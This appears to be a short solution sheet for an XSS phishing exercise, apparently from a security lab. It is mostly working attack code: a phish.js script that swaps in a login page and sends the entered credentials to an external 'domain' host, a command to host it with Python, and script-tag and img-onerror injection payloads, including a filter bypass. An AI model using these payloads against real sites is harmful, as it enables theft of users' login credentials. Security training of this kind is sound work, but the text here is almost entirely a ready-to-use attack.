Hosting method: (change the login to the login path page eg /auth.)

1. First create a file name phish.js with the following content:

   fetch("login").then(res => res.text().then(data => {
    document.getElementsByTagName("html")[0].innerHTML = data
    document.getElementsByTagName("form")[0].action = "http://domain/phish"
    document.getElementsByTagName("form")[0].method = "get"
   }))
   

2. Host the file using Python: python3 -m http.server 80

3. Inject the payload: <script src="http://ownIP/phish.js"></script>

4. Can also use the following if script tag is blocked: <img src="x" onerror="document.head.appendChild(Object.assign(document.createElement('script'), {src: 'http://domain/phish.js'}))">

Alternative Exercise Solution

1. Create a login page phishexercise.js

   document.getElementsByTagName("html")[0].innerHTML = "<form action='http://domain/login' method='GET'><input type='text' placeholder='name@example.com' name='username'><input type='password' placeholder='Password' name='password'><button class='w-100 btn btn-lg btn-primary' type='submit'>Sign in</button></form>"
   

2. Insert this into the XSS vulnerable:

   <img src='x' onerror="var s = document.createElement('script'); s.src = 'http://domain/phishingexercise.js'; s.async = true; document.body.appendChild(s);">